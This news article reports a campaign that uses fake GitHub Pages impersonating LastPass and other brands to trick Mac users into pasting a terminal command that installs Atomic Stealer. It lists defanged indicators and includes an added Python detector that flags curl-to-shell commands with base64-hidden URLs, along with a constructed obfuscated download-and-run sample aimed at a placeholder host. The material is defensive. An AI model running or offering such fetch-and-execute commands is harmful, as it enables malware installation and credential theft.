Are you an Apple Mac user? Cybercriminals are using this popular website to target you with malware and infostealers – here’s what you need to stay safe
By Efosa Udinmwen
Copyright techradar
24 September 2025
SEO tricks push fraudulent pages to the top of search results
Atomic Stealer malware installs silently via fake GitHub Pages targeting Mac users
Attackers create multiple GitHub accounts to bypass platform takedowns repeatedly
Users copying commands from unverified websites risk serious system compromise
Cybersecurity researchers are warning Apple Mac users about a campaign using fraudulent GitHub repositories to spread malware and infostealers.
Research from LastPass Threat Intelligence, Mitigation, and Escalation (TIME) analysts found attackers are impersonating well-known companies to convince people to download fake Mac software.
Two fraudulent GitHub pages pretending to offer LastPass for Mac were first spotted on September 16, 2025, under the username “modhopmduck476.”
How the attack chain works
While these particular pages have been taken down, the incident suggests a broader pattern that continues to evolve.
The fake GitHub pages included links labeled “Install LastPass on MacBook,” which redirected to hxxps://ahoastock825[.]github[.]io/.github/lastpass.
From there, users were sent to macprograms-pro[.]com/mac-git-2-download.html and told to paste a command into their Mac’s terminal.
That command used a curl request to fetch a base64-encoded URL that decoded to bonoud[.]com/get3/install.sh.
The script then delivered an “Update” payload that installed Atomic Stealer (AMOS malware) into the Temp directory.
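A pasted command of the shape described above can be checked before anyone runs it. The following is an added example, not code from LastPass or the original article: it decodes base64 tokens in a command and flags the combination of a hidden URL, a downloader and a shell. The sample commands are constructed, example.invalid is a placeholder rather than a campaign indicator, and the function names are hypothetical.

```python
import base64
import re

# Long runs of base64 alphabet characters; short tokens give too many false hits.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
# Fetched content handed to an interpreter: a pipe into a shell, or `bash -c`.
EXEC_SINK = re.compile(r"\|\s*(?:sudo\s+)?(?:/bin/)?(?:ba|z)?sh\b|\b(?:ba|z)?sh\s+-c\b")


def hidden_urls(command):
    """Return URLs that only appear after base64-decoding tokens in the command."""
    found = []
    for token in B64_TOKEN.findall(command):
        padded = token + "=" * (-len(token) % 4)
        try:
            text = base64.b64decode(padded, validate=True).decode("utf-8")
        except ValueError:  # covers binascii.Error and UnicodeDecodeError
            continue
        if text.startswith(("http://", "https://")):
            found.append(text)
    return found


def assess(command):
    """Classify a pasted terminal command before it is executed."""
    urls = hidden_urls(command)
    downloads = bool(DOWNLOADER.search(command))
    executes = bool(EXEC_SINK.search(command))
    if downloads and executes and urls:
        verdict = "block"     # hidden URL + download + execute
    elif downloads and executes:
        verdict = "review"    # remote script run unseen, destination visible
    else:
        verdict = "no-match"
    return {"verdict": verdict, "decoded_urls": urls}


# Constructed samples (assumed shapes, not the campaign's actual command).
_encoded = base64.b64encode(b"https://example.invalid/get/install.sh").decode()
OBFUSCATED = f'/bin/bash -c "$(curl -fsSL $(echo {_encoded} | base64 -d))"'
VISIBLE = "curl -fsSL https://example.invalid/install.sh | sh"
BENIGN = "softwareupdate --list"

if __name__ == "__main__":
    for sample in (OBFUSCATED, VISIBLE, BENIGN):
        print(assess(sample))
```

The decoded URL is the useful output: it shows the real download host, which can then be compared against the vendor's official domain or published indicators of compromise.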
Atomic Stealer, which has been active since April 2023, is a known infostealer used by financially motivated cybercrime groups.
Investigators have linked this campaign to many other fake repositories impersonating companies ranging from financial institutions to productivity apps.
The list of targeted names includes 1Password, Robinhood, Citibank, Docker, Shopify, Basecamp, and numerous others.
Attackers appear to create multiple GitHub usernames to bypass takedowns, using Search Engine Optimization to push their malicious links higher in Google and Bing search results.
This technique increases the chances that Mac users searching for legitimate downloads will encounter the fraudulent pages first.
LastPass states it is “actively monitoring this campaign” while working on takedowns and sharing indicators of compromise to help others detect threats.
The attackers’ use of GitHub Pages reveals both the convenience and the risks of community platforms.
Fraudulent repositories can be set up quickly, and while GitHub can remove them, attackers often return under new aliases.
This cycle raises questions about how effectively such platforms can protect users.
How to stay safe
Only download software from verified sources to avoid malware and ransomware risks.
Avoid copying commands from unfamiliar websites to prevent unauthorized code execution.
Keep macOS and all installed software up to date to reduce vulnerabilities.
Use the best antivirus or security software that includes ransomware protection to block threats.
Enable regular system backups to recover files if ransomware or malware strikes.
Stay skeptical of unexpected links, emails, and pop-ups to minimize exposure.
Monitor official advisories from trusted vendors for timely security updates and guidance.
Configure strong, unique passwords and enable two-factor authentication for important accounts.